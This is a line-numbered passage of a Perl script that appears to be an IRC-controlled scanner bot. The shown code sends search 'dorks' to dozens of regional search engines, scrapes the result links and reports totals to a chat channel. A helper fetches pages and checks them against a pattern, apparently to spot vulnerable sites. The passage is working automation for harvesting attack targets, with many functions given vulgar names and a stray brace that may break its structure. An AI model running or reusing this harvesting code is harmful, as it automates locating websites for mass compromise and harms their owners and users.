  1138. if ($engine eq "GooGLeRO") { my @googleRO = googleRO($dork); push(@total,@googleRO); }
  1139. if ($engine eq "GooGLeTW") { my @googleTW = googleTW($dork); push(@total,@googleTW); }
  1140. if ($engine eq "GooGLeZA") { my @googleZA = googleZA($dork); push(@total,@googleZA); }
  1141. if ($engine eq "GooGLePT") { my @googlePT = googlePT($dork); push(@total,@googlePT); }
  1142. if ($engine eq "AsKCA") { my @askCA = askCA($dork); push(@total,@askCA); }
  1143. if ($engine eq "AsKDE") { my @askDE = askDE($dork); push(@total,@askDE); }
  1144. if ($engine eq "AsKIT") { my @askIT = askIT($dork); push(@total,@askIT); }
  1145. if ($engine eq "AsKUK") { my @askUK = askUK($dork); push(@total,@askUK); }
  1146. if ($engine eq "AsKFR") { my @askFR = askFR($dork); push(@total,@askFR); }
  1147. if ($engine eq "AsKES") { my @askES = askES($dork); push(@total,@askES); }
  1148. if ($engine eq "AsKRU") { my @askRU = askRU($dork); push(@total,@askRU); }
  1149. if ($engine eq "AsKNL") { my @askNL = askNL($dork); push(@total,@askNL); }
  1150. if ($engine eq "AsKEU") { my @askEU = askEU($dork); push(@total,@askEU); }
  1151. if ($engine eq "AsKPL") { my @askPL = askPL($dork); push(@total,@askPL); }
  1152. if ($engine eq "AsKAT") { my @askAT = askAT($dork); push(@total,@askAT); }
  1153. if ($engine eq "AsKSE") { my @askSE = askSE($dork); push(@total,@askSE); }
  1154. if ($engine eq "AsKDK") { my @askDK = askDK($dork); push(@total,@askDK); }
  1155. if ($engine eq "AsKNO") { my @askNO = askNO($dork); push(@total,@askNO); }
  1156. if ($engine eq "AsKAU") { my @askAU = askAU($dork); push(@total,@askAU); }
  1157. if ($engine eq "AsKBR") { my @askBR = askBR($dork); push(@total,@askBR); }
  1158. if ($engine eq "AsKMX") { my @askMX = askMX($dork); push(@total,@askMX); }
  1159. if ($engine eq "AsKJP") { my @askJP = askJP($dork); push(@total,@askJP); }
  1160. if ($engine eq "BingDE") { my @bingDE = bingDE($dork); push(@total,@bingDE); }
  1161. if ($engine eq "BingUK") { my @bingUK = bingUK($dork); push(@total,@bingUK); }
  1162. if ($engine eq "BingCA") { my @bingCA = bingCA($dork); push(@total,@bingCA); }
  1163. if ($engine eq "BingBR") { my @bingBR = bingBR($dork); push(@total,@bingBR); }
  1164. if ($engine eq "BingFR") { my @bingFR = bingFR($dork); push(@total,@bingFR); }
  1165. if ($engine eq "BingES") { my @bingES = bingES($dork); push(@total,@bingES); }
  1166. if ($engine eq "BingIT") { my @bingIT = bingIT($dork); push(@total,@bingIT); }
  1167. if ($engine eq "BingBE") { my @bingBE = bingBE($dork); push(@total,@bingBE); }
  1168. if ($engine eq "BingNL") { my @bingNL = bingNL($dork); push(@total,@bingNL); }
  1169. if ($engine eq "BingPT") { my @bingPT = bingPT($dork); push(@total,@bingPT); }
  1170. if ($engine eq "BingNO") { my @bingNO = bingNO($dork); push(@total,@bingNO); }
  1171. if ($engine eq "BingDK") { my @bingDK = bingDK($dork); push(@total,@bingDK); }
  1172. if ($engine eq "BingSE") { my @bingSE = bingSE($dork); push(@total,@bingSE); }
  1173. if ($engine eq "BingCH") { my @bingCH = bingCH($dork); push(@total,@bingCH); }
  1174. if ($engine eq "BingNZ") { my @bingNZ = bingNZ($dork); push(@total,@bingNZ); }
  1175. if ($engine eq "BingRU") { my @bingRU = bingRU($dork); push(@total,@bingRU); }
  1176. if ($engine eq "BingJP") { my @bingJP = bingJP($dork); push(@total,@bingJP); }
  1177. if ($engine eq "BingCN") { my @bingCN = bingCN($dork); push(@total,@bingCN); }
  1178. if ($engine eq "BingKR") { my @bingKR = bingKR($dork); push(@total,@bingKR); }
  1179. if ($engine eq "BingMX") { my @bingMX = bingMX($dork); push(@total,@bingMX); }
  1180. if ($engine eq "BingAR") { my @bingAR = bingAR($dork); push(@total,@bingAR); }
  1181. if ($engine eq "BingCL") { my @bingCL = bingCL($dork); push(@total,@bingCL); }
  1182. if ($engine eq "BingAU") { my @bingAU = bingAU($dork); push(@total,@bingAU); }
  1183. @clean = clean(@total);
  1184. if (@clean > 0){
  1185. &msg("$chan","$logo(7@2$engine15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")");
  1186. }
  1187. return @clean;
  1188. }
  1189.  
  1190. #########################################
  1191.  
  1192. sub isFound() {
  1193. my $status = 0;
  1194. my $link = $_[0];
  1195. my $reqexp = $_[1];
  1196. my $res = get_content($link);
  1197. if ($res =~ /$reqexp/) { $status = 1 }
  1198. return $status;
  1199. }
  1200.  
  1201. sub get_content() {
  1202. my $url = $_[0];
  1203. my $ua = LWP::UserAgent->new(agent => $uagent);
  1204. $ua->timeout(20);
  1205. my $req = HTTP::Request->new(GET => $url);
  1206. my $res = $ua->request($req);
  1207. return $res->content;
  1208. }
  1209.  
  1210.  
  1211. ######################################### SEARCH ENGINE
  1212.  
  1213. sub jack1() {
  1214. my @list;
  1215. my $key = $_[0];
  1216. for (my $i=0; $i<=1000; $i+=100){
  1217. my $search = ($jack1.uri_escape($key)."&num=100&start=".$i);
  1218. my $res = search_engine_query($search);
  1219. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1220. my $link = $1;
  1221. if ($link !~ /google/){
  1222. my @grep = links($link);
  1223. push(@list,@grep);
  1224. }
  1225. }
  1226. }
  1227. return @list;
  1228. }
  1229.  
  1230. sub jack2() {
  1231. my @list;
  1232. my $key = $_[0];
  1233. for (my $i=0; $i<=1000; $i+=100){
  1234. my $search = ($jack2.uri_escape($key)."&num=100&start=".$i);
  1235. my $res = search_engine_query($search);
  1236. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1237. my $link = $1;
  1238. if ($link !~ /google/){
  1239. my @grep = links($link);
  1240. push(@list,@grep);
  1241. }
  1242. }
  1243. }
  1244. return @list;
  1245. }
  1246.  
  1247. sub jack3() {
  1248. my @list;
  1249. my $key = $_[0];
  1250. for (my $i=0; $i<=1000; $i+=100){
  1251. my $search = ($jack3.uri_escape($key)."&num=100&start=".$i);
  1252. my $res = search_engine_query($search);
  1253. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1254. my $link = $1;
  1255. if ($link !~ /google/){
  1256. my @grep = links($link);
  1257. push(@list,@grep);
  1258. }
  1259. }
  1260. }
  1261. return @list;
  1262. }
  1263.  
  1264. sub jack4() {
  1265. my @list;
  1266. my $key = $_[0];
  1267. for (my $i=0; $i<=1000; $i+=100){
  1268. my $search = ($jack4.uri_escape($key)."&num=100&start=".$i);
  1269. my $res = search_engine_query($search);
  1270. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1271. my $link = $1;
  1272. if ($link !~ /google/){
  1273. my @grep = links($link);
  1274. push(@list,@grep);
  1275. }
  1276. }
  1277. }
  1278. return @list;
  1279. }
  1280.  
  1281. sub jack5() {
  1282. my @list;
  1283. my $key = $_[0];
  1284. for (my $i=0; $i<=1000; $i+=100){
  1285. my $search = ($jack5.uri_escape($key)."&num=100&start=".$i);
  1286. my $res = search_engine_query($search);
  1287. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1288. my $link = $1;
  1289. if ($link !~ /google/){
  1290. my @grep = links($link);
  1291. push(@list,@grep);
  1292. }
  1293. }
  1294. }
  1295. return @list;
  1296. }
  1297.  
  1298. sub jack6() {
  1299. my @list;
  1300. my $key = $_[0];
  1301. for (my $i=0; $i<=1000; $i+=100){
  1302. my $search = ($jack6.uri_escape($key)."&num=100&start=".$i);
  1303. my $res = search_engine_query($search);
  1304. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1305. my $link = $1;
  1306. if ($link !~ /google/){
  1307. my @grep = links($link);
  1308. push(@list,@grep);
  1309. }
  1310. }
  1311. }
  1312. return @list;
  1313. }
  1314.  
  1315. sub jack7() {
  1316. my @list;
  1317. my $key = $_[0];
  1318. for (my $i=0; $i<=1000; $i+=100){
  1319. my $search = ($jack7.uri_escape($key)."&num=100&start=".$i);
  1320. my $res = search_engine_query($search);
  1321. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1322. my $link = $1;
  1323. if ($link !~ /google/){
  1324. my @grep = links($link);
  1325. push(@list,@grep);
  1326. }
  1327. }
  1328. }
  1329. return @list;
  1330. }
  1331.  
  1332. sub jack8() {
  1333. my @list;
  1334. my $key = $_[0];
  1335. for (my $i=0; $i<=1000; $i+=100){
  1336. my $search = ($jack8.uri_escape($key)."&num=100&start=".$i);
  1337. my $res = search_engine_query($search);
  1338. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1339. my $link = $1;
  1340. if ($link !~ /google/){
  1341. my @grep = links($link);
  1342. push(@list,@grep);
  1343. }
  1344. }
  1345. }
  1346. return @list;
  1347. }
  1348.  
  1349. sub jack9() {
  1350. my @list;
  1351. my $key = $_[0];
  1352. for (my $i=0; $i<=1000; $i+=100){
  1353. my $search = ($jack9.uri_escape($key)."&num=100&start=".$i);
  1354. my $res = search_engine_query($search);
  1355. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1356. my $link = $1;
  1357. if ($link !~ /google/){
  1358. my @grep = links($link);
  1359. push(@list,@grep);
  1360. }
  1361. }
  1362. }
  1363. return @list;
  1364. }
  1365.  
  1366. sub jack10() {
  1367. my @list;
  1368. my $key = $_[0];
  1369. for (my $i=0; $i<=1000; $i+=100){
  1370. my $search = ($jack10.uri_escape($key)."&num=100&start=".$i);
  1371. my $res = search_engine_query($search);
  1372. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1373. my $link = $1;
  1374. if ($link !~ /google/){
  1375. my @grep = links($link);
  1376. push(@list,@grep);
  1377. }
  1378. }
  1379. }
  1380. return @list;
  1381. }
  1382.  
  1383. sub jack11() {
  1384. my @list;
  1385. my $key = $_[0];
  1386. for (my $i=0; $i<=1000; $i+=100){
  1387. my $search = ($jack11.uri_escape($key)."&num=100&start=".$i);
  1388. my $res = search_engine_query($search);
  1389. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1390. my $link = $1;
  1391. if ($link !~ /google/){
  1392. my @grep = links($link);
  1393. push(@list,@grep);
  1394. }
  1395. }
  1396. }
  1397. return @list;
  1398. }
  1399.  
  1400. sub jack12() {
  1401. my @list;
  1402. my $key = $_[0];
  1403. for (my $i=0; $i<=1000; $i+=100){
  1404. my $search = ($jack12.uri_escape($key)."&num=100&start=".$i);
  1405. my $res = search_engine_query($search);
  1406. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1407. my $link = $1;
  1408. if ($link !~ /google/){
  1409. my @grep = links($link);
  1410. push(@list,@grep);
  1411. }
  1412. }
  1413. }
  1414. return @list;
  1415. }
  1416.  
  1417. sub jack13() {
  1418. my @list;
  1419. my $key = $_[0];
  1420. for (my $i=0; $i<=1000; $i+=100){
  1421. my $search = ($jack13.uri_escape($key)."&num=100&start=".$i);
  1422. my $res = search_engine_query($search);
  1423. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1424. my $link = $1;
  1425. if ($link !~ /google/){
  1426. my @grep = links($link);
  1427. push(@list,@grep);
  1428. }
  1429. }
  1430. }
  1431. return @list;
  1432. }
  1433.  
  1434. sub jack14() {
  1435. my @list;
  1436. my $key = $_[0];
  1437. for (my $i=0; $i<=1000; $i+=100){
  1438. my $search = ($jack14.uri_escape($key)."&num=100&start=".$i);
  1439. my $res = search_engine_query($search);
  1440. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1441. my $link = $1;
  1442. if ($link !~ /google/){
  1443. my @grep = links($link);
  1444. push(@list,@grep);
  1445. }
  1446. }
  1447. }
  1448. return @list;
  1449. }
  1450.  
  1451. sub jack15() {
  1452. my @list;
  1453. my $key = $_[0];
  1454. for (my $i=0; $i<=1000; $i+=100){
  1455. my $search = ($jack15.uri_escape($key)."&num=100&start=".$i);
  1456. my $res = search_engine_query($search);
  1457. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1458. my $link = $1;
  1459. if ($link !~ /google/){
  1460. my @grep = links($link);
  1461. push(@list,@grep);
  1462. }
  1463. }
  1464. }
  1465. return @list;
  1466. }
  1467.  
  1468. sub jack16() {
  1469. my @list;
  1470. my $key = $_[0];
  1471. for (my $i=0; $i<=1000; $i+=100){
  1472. my $search = ($jack16.uri_escape($key)."&num=100&start=".$i);
  1473. my $res = search_engine_query($search);
  1474. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1475. my $link = $1;
  1476. if ($link !~ /google/){
  1477. my @grep = links($link);
  1478. push(@list,@grep);
  1479. }
  1480. }
  1481. }
  1482. return @list;
  1483. }
  1484.  
  1485. sub jack17() {
  1486. my @list;
  1487. my $key = $_[0];
  1488. for (my $i=0; $i<=1000; $i+=100){
  1489. my $search = ($jack17.uri_escape($key)."&num=100&start=".$i);
  1490. my $res = search_engine_query($search);
  1491. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1492. my $link = $1;
  1493. if ($link !~ /google/){
  1494. my @grep = links($link);
  1495. push(@list,@grep);
  1496. }
  1497. }
  1498. }
  1499. return @list;
  1500. }
  1501.  
  1502. sub jack18() {
  1503. my @list;
  1504. my $key = $_[0];
  1505. for (my $i=0; $i<=1000; $i+=100){
  1506. my $search = ($jack18.uri_escape($key)."&num=100&start=".$i);
  1507. my $res = search_engine_query($search);
  1508. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1509. my $link = $1;
  1510. if ($link !~ /google/){
  1511. my @grep = links($link);
  1512. push(@list,@grep);
  1513. }
  1514. }
  1515. }
  1516. return @list;
  1517. }
  1518.  
  1519. sub jack19() {
  1520. my @list;
  1521. my $key = $_[0];
  1522. for (my $i=0; $i<=1000; $i+=100){
  1523. my $search = ($jack19.uri_escape($key)."&num=100&start=".$i);
  1524. my $res = search_engine_query($search);
  1525. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1526. my $link = $1;
  1527. if ($link !~ /google/){
  1528. my @grep = links($link);
  1529. push(@list,@grep);
  1530. }
  1531. }
  1532. }
  1533. return @list;
  1534. }
  1535.  
  1536. sub jack20() {
  1537. my @list;
  1538. my $key = $_[0];
  1539. for (my $i=0; $i<=1000; $i+=100){
  1540. my $search = ($jack20.uri_escape($key)."&num=100&start=".$i);
  1541. my $res = search_engine_query($search);
  1542. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1543. my $link = $1;
  1544. if ($link !~ /google/){
  1545. my @grep = links($link);
  1546. push(@list,@grep);
  1547. }
  1548. }
  1549. }
  1550. return @list;
  1551. }
  1552.  
  1553. sub kontol() {
  1554. my @list;
  1555. my $key = $_[0];
  1556. for (my $i=0; $i<=1000; $i+=100){
  1557. my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i);
  1558. my $res = search_engine_query($search);
  1559. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1560. my $link = $1;
  1561. if ($link !~ /google/){
  1562. my @grep = links($link);
  1563. push(@list,@grep);
  1564. }
  1565. }
  1566. }
  1567. return @list;
  1568. }
  1569.  
  1570. sub pepek() {
  1571. my @list;
  1572. my $key = $_[0];
  1573. for ($b=0; $b<=100; $b+=1) {
  1574. my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=text&page=".$b);
  1575. my $res = search_engine_query($search);
  1576. while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) {
  1577. my $link = $1;
  1578. if ($link !~ /walla\.co\.il/){
  1579. my @grep = links($link);
  1580. push(@list,@grep);
  1581. }
  1582. }
  1583. }
  1584. return @list;
  1585. }
  1586.  
  1587. sub tetek(){
  1588. my @list;
  1589. my $key = $_[0];
  1590. for ($b=1; $b<=1000; $b+=10) {
  1591. my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=".$b);
  1592. my $res = search_engine_query($search);
  1593. while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
  1594. my $link = $1;
  1595. if ($link !~ /yahoo\.com/){
  1596. my @grep = links($link);
  1597. push(@list,@grep);
  1598. }
  1599. }
  1600. }
  1601. return @list;
  1602. }
  1603.  
  1604. sub itil() {
  1605. my @list;
  1606. my $key = $_[0];
  1607. for (my $i=1; $i<=1000; $i+=100) {
  1608. my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  1609. my $res = search_engine_query($search);
  1610. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  1611. my $link = $1;
  1612. if ($link !~ /ask\.com/){
  1613. my @grep = links($link);
  1614. push(@list,@grep);
  1615. }
  1616. }
  1617. }
  1618. return @list;
  1619. }
  1620.  
  1621. sub nennen() {
  1622. my @list;
  1623. my $key = $_[0];
  1624. my $b = 0;
  1625. for ($b=1; $b<=400; $b+=10) {
  1626. my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key));
  1627. my $res = search_engine_query($search);
  1628. while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
  1629. my $link = $1;
  1630. if ($link !~ /onet|webcache|query/){
  1631. my @grep = links($link);
  1632. push(@list,@grep);
  1633. }
  1634. }
  1635. }
  1636. return @list;
  1637. }
  1638.  
  1639. sub susu() {
  1640. my @list;
  1641. my $key = $_[0];
  1642. my $b = 0;
  1643. for ($b=10; $b<=200; $b+=10) {
  1644. my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&");
  1645. my $res = search_engine_query($search);
  1646. if ($res !~ /next/) {$b=100;}
  1647. while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
  1648. my $link = $1;
  1649. if ($1 !~ /yippy\.com/){
  1650. my @grep = links($link);
  1651. push(@list,@grep);
  1652. }
  1653. }
  1654. }
  1655. return @list;
  1656. }
  1657.  
  1658. sub buahdada() {
  1659. my @list;
  1660. my $key = $_[0];
  1661. for (my $i=1; $i<=400; $i+=10) {
  1662. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
  1663. my $res = search_engine_query($search);
  1664. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  1665. my $link = $1;
  1666. if ($link !~ /google/) {
  1667. my @grep = links($link);
  1668. push(@list,@grep);
  1669. }
  1670. }
  1671. }
  1672. return @list;
  1673. }
  1674.  
  1675. sub payudara(){
  1676. my @list;
  1677. my $key = $_[0];
  1678. for ($b=1; $b<=50; $b+=1) {
  1679. my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local");
  1680. my $res = search_engine_query($search);
  1681. if ($res !~ m/Next/i) {$b=50;}
  1682. while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
  1683. my $link = $1;
  1684. if ($1 !~ /\.sapo\.pt/){
  1685. my @grep = links($link);
  1686. push(@list,@grep);
  1687. }
  1688. }
  1689. }
  1690. return @list;
  1691. }
  1692.  
  1693. sub kentot() {
  1694. my @list;
  1695. my $key = $_[0];
  1696. for ($b=0; $b<=50; $b+=1) {
  1697. my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$b);
  1698. my $res = search_engine_query($search);
  1699. while ($res =~ m/title=\"http:\/\/(.*?)\"/g) {
  1700. my $link = $1;
  1701. if ($link !~ /lycos\.com/){
  1702. my @grep = links($link);
  1703. push(@list,@grep);
  1704. }
  1705. }
  1706. }
  1707. return @list;
  1708. }
  1709.  
  1710. sub emel() {
  1711. my @list;
  1712. my $key = $_[0];
  1713. for ($b=0; $b<=1000; $b+=10) {
  1714. my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($key)."&start=".$b);
  1715. my $res = search_engine_query($search);
  1716. if ($res =~ m/retornou nenhum resultado/i) {$b=500;}
  1717. while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
  1718. my $link = $1;
  1719. if ($link !~ /uol\.com\.br|\/web/i){
  1720. my @grep = links($link);
  1721. push(@list,@grep);
  1722. }
  1723. }
  1724. }
  1725. return @list;
  1726. }
  1727.  
  1728. sub oral() {
  1729. my @list;
  1730. my $key = $_[0];
  1731. for ($b=0; $b<=50; $b+=1) {
  1732. my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key));
  1733. my $res = search_engine_query($search);
  1734. if ($res =~ m/had no web result/i) {$b=50;}
  1735. while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) {
  1736. my $link = $1;
  1737. if ($link !~ /hotbot\.com/){
  1738. my @grep = links($link);
  1739. push(@list,@grep);
  1740. }
  1741. }
  1742. }
  1743. return @list;
  1744. }
  1745.  
  1746. sub klitoris() {
  1747. my @list;
  1748. my $key = $_[0];
  1749. for ($b=0; $b<=300; $b+=10) {
  1750. my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b);
  1751. my $res = search_engine_query($search);
  1752. while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
  1753. my $link = $1;
  1754. if ($link !~ /aol\.com/){
  1755. my @grep = links($link);
  1756. push(@list,@grep);
  1757. }
  1758. }
  1759. }
  1760. return @list;
  1761. }
  1762.  
  1763. sub masturbasi() {
  1764. my $key = $_[0];
  1765. my @list;
  1766. for ($b=1; $b<=500; $b+=10) {
  1767. $num += $num;
  1768. my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all";
  1769. my $res = search_engine_query($search);
  1770. while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) {
  1771. my $link = $1;
  1772. if ($link !~ /biglobe/){
  1773. my @grep = links($link);
  1774. push(@list,@grep);
  1775. }
  1776. }
  1777. }
  1778. return @list;
  1779. }
  1780.  
  1781. sub onani() {
  1782. my @list;
  1783. my $key = $_[0];
  1784. my $b = 0;
  1785. my @doms = ("nl","au","br","ca","de","es","fr","it","uk");
  1786. foreach my $domain (@doms) { #$dom = $doms[rand(scalar(@doms))];
  1787. for (my $i=1; $i<=1000; $i+=100) {
  1788. my $search = ("http://".$domain.".search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  1789. my $res = search_engine_query($search);
  1790. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  1791. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep);
  1792. }
  1793. }
  1794. } return @list;
  1795. }
  1796.  
  1797. sub sperma() {
  1798. my @list;
  1799. my $key = $_[0];
  1800. for (my $i=10; $i<=1000; $i+=100){
  1801. my $search = ("http://www.kvasir.no/nettsok?q=".$i."&pageSize=100&q=".uri_escape($key)."");
  1802. my $res = search_engine_query($search);
  1803. while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  1804. my $link = $1; if ($link !~ /kvasir/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep);
  1805. }
  1806. }
  1807. }
  1808. return @list;
  1809. }
  1810.  
  1811. sub anal() {
  1812. my @lst;
  1813. my $key = $_[0];
  1814. for (my $i=0; $i<=50; $i+=1){
  1815. my $search = ("http://quintura.com/?request=".uri_escape($key)."&tab=0&page=".$i."&tabid=");
  1816. my $res = search_engine_query($search);
  1817. while ($res =~ m/<a href=\"?http:\/\/(.+?)\//g) {
  1818. my $link = $1;
  1819. if ($link !~ /quintura/){
  1820. my @grep = links($link);
  1821. push(@lst,@grep);
  1822. }
  1823. }
  1824. }
  1825. return @lst;
  1826. }
  1827.  
  1828. sub puting() {
  1829. my @list;
  1830. my $key = $_[0];
  1831. for ($b=1; $b<=1000; $b+=100) {
  1832. my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
  1833. my $res = search_engine_query($search);
  1834. while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {
  1835. if ($1 !~ /seznam/){
  1836. my $link = $1;
  1837. my @grep = links($link);
  1838. push(@list,@grep);
  1839. }
  1840. }
  1841. }
  1842. return @list;
  1843. }
  1844.  
  1845. sub vagina(){
  1846. my @list;
  1847. my $key = $_[0];
  1848. my $i = 0;
  1849. for ($i=0; $i<=100; $i+=1){
  1850. my $web=("http://startgoogle.startpagina.nl/index.php?q=".uri_escape($key)."&start=".$i."&origin=homepage&source=geentaal");
  1851. my $Res= search_engine_query($web);
  1852. while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  1853. if ($1 !~ /pagina|pagina's/){
  1854. my $k=$1;
  1855. my @grep=links($k);
  1856. push(@list,@grep);
  1857. }
  1858. }
  1859. }
  1860. return @list;
  1861. }
  1862.  
  1863. sub penis(){
  1864. my @list;
  1865. my $key = $_[0];
  1866. for($b=1;$b<=1000;$b+=100){
  1867. my $Th=("http://www.google.pt/search?q=".uri_escape($key)."&in=Mundial&num=25&ckWhere=Mundo&position=".$b."");
  1868. my $Res=search_engine_query($Th);
  1869. while($Res =~ m/href=\"http:\/\/(.+?)\//g){
  1870. my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep);
  1871. }
  1872. }
  1873. return @list;
  1874. }
  1875.  
  1876. sub memek() {
  1877. my @list;
  1878. my $key = $_[0];
  1879. for (my $i=1; $i<=50; $i+=1) {
  1880. my $search = ("http://it.ask.com/web?q=".uri_escape($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all");
  1881. my $res = search_engine_query($search);
  1882. if ($res !~ /Successiva/) {$i=50;}
  1883. while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {
  1884. if ($1 !~ /ask\.com/){
  1885. my $link = $1;
  1886. my @grep = links($link);
  1887. push(@list,@grep);
  1888. }
  1889. }
  1890. }
  1891. return @list;
  1892. }
  1893. }
  1894. sub googleCA() {
  1895. my @list;
  1896. my $key = $_[0];
  1897. for (my $i=0; $i<=1000; $i+=100){
  1898. my $search = ("http://www.google.ca/search?q=".uri_escape($key)."&hl=&cr=countryCA&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  1899. my $res = &search_engine_query($search);
  1900. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1901. my $link = $1;
  1902. if ($link !~ /googleCA/){
  1903. my @grep = links($link);
  1904. push(@list,@grep);
  1905. }
  1906. }
  1907. }
  1908. return @list;
  1909. }
  1910.  
  1911. sub googleDE() {
  1912. my @list;
  1913. my $key = $_[0];
  1914. for (my $i=0; $i<=1000; $i+=100){
  1915. my $search = ("http://www.google.de/search?q=".uri_escape($key)."&hl=&cr=countryDE&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  1916. my $res = &search_engine_query($search);
  1917. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1918. my $link = $1;
  1919. if ($link !~ /googleDE/){
  1920. my @grep = links($link);
  1921. push(@list,@grep);
  1922. }
  1923. }
  1924. }
  1925. return @list;
  1926. }
  1927.  
  1928. sub googleUK() {
  1929. my @list;
  1930. my $key = $_[0];
  1931. for (my $i=0; $i<=1000; $i+=100){
  1932. my $search = ("http://www.google.co.uk/search?q=".uri_escape($key)."&hl=&cr=countryUK&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  1933. my $res = &search_engine_query($search);
  1934. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1935. my $link = $1;
  1936. if ($link !~ /googleUK/){
  1937. my @grep = links($link);
  1938. push(@list,@grep);
  1939. }
  1940. }
  1941. }
  1942. return @list;
  1943. }
  1944.  
  1945. sub googleFR() {
  1946. my @list;
  1947. my $key = $_[0];
  1948. for (my $i=0; $i<=1000; $i+=100){
  1949. my $search = ("http://www.google.fr/search?q=".uri_escape($key)."&hl=&cr=countryFR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  1950. my $res = &search_engine_query($search);
  1951. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1952. my $link = $1;
  1953. if ($link !~ /googleFR/){
  1954. my @grep = links($link);
  1955. push(@list,@grep);
  1956. }
  1957. }
  1958. }
  1959. return @list;
  1960. }
  1961.  
  1962. sub googleES() {
  1963. my @list;
  1964. my $key = $_[0];
  1965. for (my $i=0; $i<=1000; $i+=100){
  1966. my $search = ("http://www.google.es/search?q=".uri_escape($key)."&hl=&cr=countryES&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  1967. my $res = &search_engine_query($search);
  1968. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1969. my $link = $1;
  1970. if ($link !~ /googleES/){
  1971. my @grep = links($link);
  1972. push(@list,@grep);
  1973. }
  1974. }
  1975. }
  1976. return @list;
  1977. }
  1978.  
  1979. sub googleIT() {
  1980. my @list;
  1981. my $key = $_[0];
  1982. for (my $i=0; $i<=1000; $i+=100){
  1983. my $search = ("http://www.google.it/search?q=".uri_escape($key)."&hl=&cr=countryIT&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  1984. my $res = &search_engine_query($search);
